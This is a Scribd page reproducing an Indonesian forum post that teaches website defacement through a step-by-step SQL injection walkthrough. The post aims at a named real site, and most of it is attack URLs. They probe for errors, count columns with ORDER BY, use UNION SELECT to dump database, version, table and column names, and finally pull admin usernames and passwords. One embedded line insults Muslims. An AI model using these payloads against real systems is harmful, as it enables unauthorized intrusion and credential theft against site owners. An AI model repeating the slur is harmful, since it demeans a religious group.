Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
36Activity
0 of .
Results for:
No results containing your search query
P. 1
Hack Deface website bagaimana cara mendeface website

Hack Deface website bagaimana cara mendeface website

Ratings: (0)|Views: 5,609 |Likes:
Published by sawasaqa
Hack Deface website bagaimana cara mendeface website.doc
Hack Deface website bagaimana cara mendeface website.doc

More info:

Published by: sawasaqa on Jun 28, 2009
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

01/05/2013

pdf

text

original

 
Hack Deface website bagaimana caramendeface website
?kebetulan banget ne,aku juga lagi pengen bisa belajar sql injection,mas DOS bagi bagiilmunya dong. Nie aku ada dikit dasr buat di baca baca ,sekalian aku mau minta saran dari sang master deface di hc ini.1.Cari targetex http://www.kaskus.us/shop.php?id=962.cari tau ada bugs or gacara : tambahin ' di akhir uidhttp://www.kaskus.us/shop.php?id=96'kalo ada pesan erornya,berarti tuh ada bugsnya,n siap kita oprek.3.hitung field di databasenyacara : tambahin +order+by+nominal/*contoh :http://www.kaskus.us/shop.php?id=96+order+by+14/*keterangan
Dasar guoooooblok orang islam gua aja minoritas mampu membuat websitekaskus.us!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
 
disini kita main tebak tebakan.Kira2 ada berapa field di databesnya.Kita isi ajanominalnya dari 1 sampai ada pesan erornya.pada contoh di atas jumlah koolomnya ada14,berarti pada nominal ke 14 pesan erornya tidak ada,and pada nominal 15 ada pesanerornya.4.Sekarangh kita cari magic numbernyacara : abis uid kita tambah +union+select+nominal jumlah kolomcontohhttp://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*liat angka berapa yg nongol.dalam contoh ini yg kluar angka 65.sekarang kita liat versinya {ada yg bilang klo bagian ini ga penting banget}cara : maggic number yg kluar tadi kita ganti denganconcat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6contoh http://www.kaskus.us/shop.php?id=989 unionselect1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*6.keluarin tablenyacara kita tambahkan +from+information_schema.tables/* setelah angka terakhir contoh http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tablesups ga isa...akalin ah.gimana kalo ditambahin lagi menjadi <pizzy>http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/*/*gunanya apa itu sie???? hehehe aku juga ga ngerti,pas aku nyoba n gagal aku konsul matemen,n kata dia suruh nambah itu di belakanganya,walhasil bisa kalian liat.7.saatnya cari kolomcara sama kaya cara diatas,cuman tabel ganti sama column aja8.cari user name n pass nyanah buat yg satu ini aku belom pamah bener jadi ga berani aku tulis,soalnya aku jugamasih mumet,pernah nyoba,pernah sukses,pernah gagal.cuman buat kasus yg ini,contoh ini aku udah tau kelanjutanya,soalnya di bantu temen pas bagian ininya.
 
akhir dari cerita ini{cieeee} akan berujung dihttp://www.kaskus.us/shop.php?id=989+union+select+1,2,3,4,5,concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/* buat master2 deface hc,mohon cara yg aku pake ini di sempurnakan dong,aku banyak yang salah tuh.nyatanya dari 4 target yg aku coba,tiap target ga bisa di selesaikan dengansatu cara.Mksdnya,dalam cari bugs,cari table,cari magic number,aku selalu pake cara yg beda.Akudapet berbagai cara dalam deface web,bukanya bikin aku jadi tambah mudeng,malah ajditambah pusing aku,pusing milih,mana sie tutor yg bener,masa caranya beda beda.?????? buat yg ikut jalan ku,nyoba cara yg ini,n sukses,post ya,bagi yg gagal juga post,gagalnyadimana,biar mas DOS yg nanganin.Wkwkwkwkwkwk kan beliau yang lebih ahli....Pisss mas DOS.... _________________ Rasa ingin tau adalah motivasi yang sangat bagus.Back to topDisplay posts from previous: All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1Year Oldest FirstNewest FirstAll times are GMT + 7 Hours

Activity (36)

You've already reviewed this. Edit your review.
1 hundred reads
1 thousand reads
Fajrin liked this
Smenohu liked this
AgusSolihin liked this
aguspriyanto05 liked this
inurdin_1 liked this

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->